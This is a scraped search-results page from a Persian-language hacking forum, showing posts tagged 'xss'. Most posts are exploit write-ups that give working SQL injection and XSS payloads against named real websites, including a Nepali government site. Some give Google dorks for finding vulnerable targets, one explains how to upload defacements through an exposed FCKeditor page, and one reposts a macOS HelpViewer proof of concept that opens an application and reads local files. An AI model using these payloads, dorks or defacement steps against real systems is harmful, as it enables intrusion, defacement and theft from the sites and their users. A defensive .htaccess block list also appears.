امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'xss'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

55 نتیجه پیدا شد

  1. [+] Title :- Photo Organizer - XSS and SQL Vulnerabilities [+] Date :- 2018-09-10 [+] Exploit Author :- Rednofozi [+] Vendor Homepage :- http://po.shaftnet.org/ [+] Version :- All Versions [+] Software Link: :- http://po.shaftnet.org/#download [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- intext:"Powered by Photo Organizer" [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ########################################################  0x01# ~ Introduction ==================== At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.” To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository. 0x02# ~ Exploitation ==================== 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Boolean SQL Injection & Blind [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 http://site.com/user.php?user=1 and 1=2 http://site.com/user.php?user=1 union select 1,2-- http://site.com/user.php?user=-1 OR 17-7=10 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Reflected XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):login.php search.text.general.php login.php?operation=get_email register.php ========================== HTTP REQUEST XSS 1 ============================== Host site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 113 POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0 XSS Proof Image: http://i.imgur.com/VmbmuiZ.png ============================================================================ ========================== HTTP REQUEST XSS 2 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/search.text.general.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 109 POST: search_string='"><script>alert('1337')</script>&search_type=¤t_user=all&x=0&y=0 XSS Proof Image: http://i.imgur.com/PDcO50Y.png ============================================================================ ========================== HTTP REQUEST XSS 3 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php?operation=get_email Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 91 POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0 XSS Proof Image: http://i.imgur.com/MFc5unu.png ============================================================================ ========================== HTTP REQUEST XSS 4 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/register.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 207 POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0 XSS Proof Image: http://i.imgur.com/7T4WZMW.png ============================================================================ 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Persistent XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):album.add.php?parent= ========================== HTTP REQUEST XSS 5 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/album.add.php?parent= Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 132 POST: album_caption='"><script>alert('1337')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0 XSS Proof Image: http://i.imgur.com/TrzBqXJ.png ============================================================================ -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2026
  2. Pro-Exploit

    [+] Title :- AKP Meda Design Admin Panel XSS [+] Date :- 2018-09-10 [+] Exploit Author :- Rednofozi [+] Vendor Homepage :-N/A [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- N/A [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## Developers: VNSinfo/akpwork App Version: All Vuln: /admin/index.php?msg=<HERE> Example List \/ Example 1: http://www.insightradiology.com.au/admin/index.php?msg=<svg/onload=alert(document.domain)> Example 2: http://thedukehotel.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E Example 3: http://gremarine.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E Example 4: http://worklocker.com.au/admin/index.php?msg=%3Csvg/onload=alert(document.domain)%3E Example 5: http://www.fxma.com.au/admin/?msg=%3Csvg/onload=alert(document.domain)%3E Examples End /\ ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2024
  3. Hacking-Penetration testing to the site

    // Reflected XSS in AdultJoy (Adult website) // Site URL: http://adultjoy.net/ Vulnerable PHP: search.php Vulnerable URL: http://adultjoy.net/search.php?search= Payload Used: %3Csvg/onload=(confirm)()%3E PoC Url: http://adultjoy.net/search.php?search=%3Csvg/onload=(confirm)()%3E Found by: da74
  4. // Reflected XSS in PornZebra Search Engine // Site URL: http://pornzebra.com/ Vulnerable PHP: search.php Vulnerable URL: http://pornzebra.com/search.php?q= Payload Used: %3Csvg/onload=(confirm)()%3E PoC Url: http://pornzebra.com/search.php?q=%3Csvg/onload=(confirm)()%3E Found by: da74
  5. Pro-Exploit

    ############################################ # Title :Russia site view.php XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :photolipetsk.ru # Google Dork: inurl:''/.view.php?PID= /view.php?PID=' site:ru ############################################ # search google Dork : inurl:''/.view.php?PID= /view.php?PID=' site:ru ####################Proof of Concept ############# #Demo : https://photolipetsk.ru/view.php?pid=57472&cat=12' (xxs Vulnerability) <script>alert("rednofozi")</script> # Discovered by : Rednofozi #tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1984
  6. ############################################ # Title : user and password of the American Recovery site XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :https://www.diamondcard.us # Google Dork: inurl:''/.php?pass=' site:us ############################################ # search google Dork :inurl:''/.php?pass=' site:us ####################Proof of Concept ############# #Demo and test : https://www.diamondcard.us/download/api/example.php' (xxsVulnerability) <script>alert("rednofozi")</script> # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1982
  7. Pro-Exploit

    ############################################ # Title :CMd npal XSS Vulnerability # Author :anonysec # category : webapps # Tested On : Win 8 , Kali Linux # team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :http://ag.gov.np # Google Dork: inurl:''/.php?cmd=' site:np ############################################ # search google Dork : inurl:''/.php?cmd=' site:np ####################Proof of Concept ############# #Demo : http://ag.gov.np/cgialfa/alfasymlink/alfaperl.txt/home/pahsgov11/public_html/noscript.php' (xxsVulnerability) <script>alert("rednofozi")</script> # Discovered by : Rednofozi #tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1981
  8. Pro-Exploit

    http://www.exploit4arab.org/exploits/1979 ############################################ # Title : Designed by YouBon XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :https://www.youbon.ir # Google Dork: 'inurl:''/details.php?id='' site:ir' ############################################ # search google Dork :'inurl:''/details.php?id='' site:ir' ####################Proof of Concept ############# #Demo : https://www.youbon.ir/product-details.php?id=2037' (xxsVulnerability) <script>alert("rednofozi")</script> # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
  9. ############################################ # Title : Designed by iran sites XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :http://www.belkad.ir # Google Dork: inurl:''/details.php?id='' site:ir ############################################ # search google Dork :inurl:''/details.php?id='' site:ir ####################Proof of Concept ############# #Demo : http://www.belkad.ir/article-details.php?id=139' (xxsVulnerability) <script>("rednofozi")</script> # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1977
  10. Pro-Exploit

    ############################################ # Title : resaneh-fc.ir XSS Vulnerability # Author :Rednofozi # category : webapps # Tested On : Win 8 , Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :resaneh-fc.ir # Google Dork: N/A ############################################ # search google Dork : N/A ####################Proof of Concept ############# #Demo : http://resaneh-fc.ir/details.php?id=67_0_3_0_C' (xxsVulnerability) اسپریکت باگ xxs رو داخل نت سر چ کنید # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
  11. Hacking-Bugs

    مهاجم با ارسال کد جاوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
  12. کد زیر رو به فایل htaccess اضافه کنید. RewriteEngine On RewriteCond %{QUERY_STRING} (java******:|java******%3A|%3B|'|"|%22|char|%2F..|..%2F|/..|../|%00|etc|passwd|configuration.php|union|select|insert|drop|update|benchmark|schema|unhex|0x) [NC] RewriteRule .* - [F] RewriteCond %{QUERY_STRING} (<|%3C) [NC] RewriteRule .* - [F] RewriteCond %{QUERY_STRING} (>|%3E) [NC] RewriteRule .* - [F] RewriteCond %{QUERY_STRING} (<|%3C).*******.*(>|%3E) [NC] RewriteRule .* - [F]
  13. Hacking-Bugs

    بر اساس آخرین گزارش امنیتی تمامی پلاگین‌ها و تم‌های وردپرس که از genericons package استفاده می‌کنند. از این آسیب پذیری رنج میبرند DOM-based این آسیب‌پذیری به دلیل وجود فایل نا امن در genericons package به وجود اماده هست. همان طور که در پست قبلی گزارش شد که حفره Cross Site Script در پوسته پیشفرض Twenty Fifteen وردپرس وجود دارد همچنین وجود این حفره در پلاگین‌ JetPack که بیش از یک‌میلیون بار نصب‌ شده است و تم TwentyFifteen که به‌طور پیش‌فرض در وردپرس موجود است تایید شده است. genericons package شامل فایل ناامن example.html می‌شود که با سوءاستفاده هکرها می‌توان کدهای مخرب جاوا اسکریپت را اجرا کرد و کنترل سایت را به دست گرفت. همچنین توصیه میشود جهت جلوگیری از نفوذ فایل example.html پاک یا اجازه دسترسی به این فایل داده نشود.
  14. Hacking-Bugs

    نسخه فعلی وردپرس یعنی ورژن 4.2 که چند روز پیش منتشر شد دارای آسیب پذیری XSS میباشد مهاجم با ارسال کد جاوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد. آسیب پذیری جدید XSS در این ورژن به تازگی منتشر شده که سایت های وردپرسی مورد حمله نفوذگر ها قرار داده است. در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
  15. Hacking-Bugs

    آسیب پذیری WordPress Revslider 4.2.2 XSS آسیب پذیری جدیدی در Revslider وردپرس کشف شد که با سو استفاده از این حفره میتوان اقدام به اجرای دستورات جاوا اسکریپت نمود Revslider در نسخه های قبلی هم از آسیب پذیری هایه Xss , LFD بهره مند بود که در نسخه 4.2.2 نیز حفره Cross Site Script کشف و اکسپلویت شد.
  16. جدیدا در توابع add_query_arg و همچنین remove_query_arg که در بیشتر پلاگین های وردپرس استفاده شده باگ Cross Site Script یافت شده که در تمامی پلاگین های زیر موجود میباشد. Jetpack WordPress SEO Google Analytics by Yoast All In one SEO Gravity Forms Multiple Plugins from Easy Digital Downloads UpdraftPlus WP-E-Commerce WPTouch Download Monitor Related Posts for WordPress My Calendar P3 Profiler Give Multiple iThemes products including Builder and Exchange Broken-Link-Checker Ninja Form همچنین توصیه میشود برای امنیت بیشتر به جای توابع از 2 توابع زیر استفاده کنید
  17. ############################################################### # Title : RadioJavan XSS Vulnerability # Author : AnonySec # Vendor : www.radiojavan.com # Tasted on : Win 10 , Kali linux ############################################################### ==> go to RadioJavan ==> Then Inject Xss Code on Search box ##################################################### demo ==> https://www.radiojavan.com/artist/<script>alert("AnonySec")</script> ##################################################### ##################################################### Registered in ==> http://www.zone-h.org/mirror/id/30495771?hz=1 ##################################################### #Discovered by : Moeein Seven | www.moeein.ir #my Team : www.AnonySec.org #Thanks to : Reza Cloner , Sh3ikh Shahin , Milad Shadow , Rednofozi , SoldierAnonymous , DoctorRobot , BlackPetya and all bax from AnonySec Team RadioJavan.com XSS Vulnerability - CXSecurity.com
  18. Programming-Py

    این ابزار حرفه ای امکان اسکن سایت از این باگ میباشد که به صورت حرفه ای و تخصصی به روی xss مانور میدهد امکانات استفاده از متد های GET و POST قابلیت برداشتن کوکی ها بایپیس WAF قابلیت بایپس ف/ی/ل/ت/ر های سخت در فایر وال های قوی استفاده از رمزنگاری قوی ساخت پیلود های هوشمند توضیح قابلیت نصب در سیستم های ویندوز و انواع لینوکس با استفاده از پایتون ۲٫۷ با استفاده از این ابزار حملات xss خود را یک قدم جلو تر ببرید و به صورت حرفه ای اقدام کنید نصب ابتدا ابزار را از لینک گیت هاب بگیرید1 درون پوشه ابزار میرویم با دیتور زیر نصب را اغاز کنید برای اجرای ان یا فقط xsstrike یا حق
  19. Hacking-Penetration testing to the site

    inurl:".php?cmd=" inurl:".php?z=" inurl:".php?q=" inurl:".php?search=" inurl:".php?query=" inurl:".php?searchstring=" inurl:".php?keyword=" inurl:".php?file=" inurl:".php?years=" inurl:".php?txt=" inurl:".php?tag=" inurl:".php?max=" inurl:".php?from=" inurl:".php?author=" inurl:".php?pass=" inurl:".php?feedback=" inurl:".php?mail=" inurl:".php?cat=" inurl:".php?vote=" inurl:search.php?q= inurl:com_feedpostold/feedpost.php?url= inurl:scrapbook.php?id= inurl:headersearch.php?sid= inurl:/poll/default.asp?catid= inurl:/search_results.php?search= مجموعه دورک های خوب و با تعداد سایت اسیب پذیر بالا برای نفوذگران عزیز تیم اگر نمیدانید که XSS چیست میتوانید اموزش تخصصی زیر را مطالعه کنید https://anonysec.org/topic/8359-باگ-xss-چیست-؟/
  20. Hacking-Bugs

    آسیب پذیری XSS مخفف سه کلمه Cross site scripting میباشد که به معنی اجرا اسکریپت در سایت میباشد همان طور که از نامش پیداست به نفوذگر این امکان را میدهد تا اسکریپت خود را در وبسایت اراجرا کند این اسکریپ ها فقط و میتوانند از زبان های کلاینت سرور باشند یعنی برای کاربر قابل مشاهده است به عنوان مثال برای درک بهتر از زبان های html , css , javascript استفاده میشود که هر کدام کاربرد و مزیت های خود را دارند
  21. Hacking-Bugs

    باگ xss نوعی از خطرناک ترین باگ ها در روی سایت ها می باشد دروک مورد نیاز برای یافتن سایت های دارای باگ xss دروک 👇 inurl:frame=product_detail خب حالا خواستیم دیفیس خود را روی سایتی که دارای باگ هست اپلود کنیم دروک زیر را بخ اخر سایت وارد میکنیم. مثلا اگه ادرس سایت مثل ادرس زیر هست VegaStore - Chuyên Mua Bán SmartPhone دروک زیرا به این صورت وارد میکنیم/jscripts/FCKeditor/editor/filemanager/upload/test.html دروک را به این صورت روی سایت وارد میکنیم http://vegastorevn.com/jscripts/FCKeditor/editor/filemanager/upload/test.html وحالا میتونیم دیفیس خود را اپلود کنیم با تشکر ✌ اموزشی ساده برای تازه کارا میباشد
  22. <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040 HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest. HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../". PoC: document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)"; The attached poc will pop up a Calculator. Tested on macOS Sierra 10.12.1 (16B2659). --> <script> /* OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read. HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest. HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../". PoC: document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)"; The attached poc will pop up a Calculator. Tested on macOS Sierra 10.12.1 (16B2659). */ function main() { function second() { var f = document.createElement("iframe"); f.onload = () => { f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app"; }; f.src = "help:openbook=com.apple.safari.help"; document.documentElement.appendChild(f); } var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();"; document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url; } main(); </script>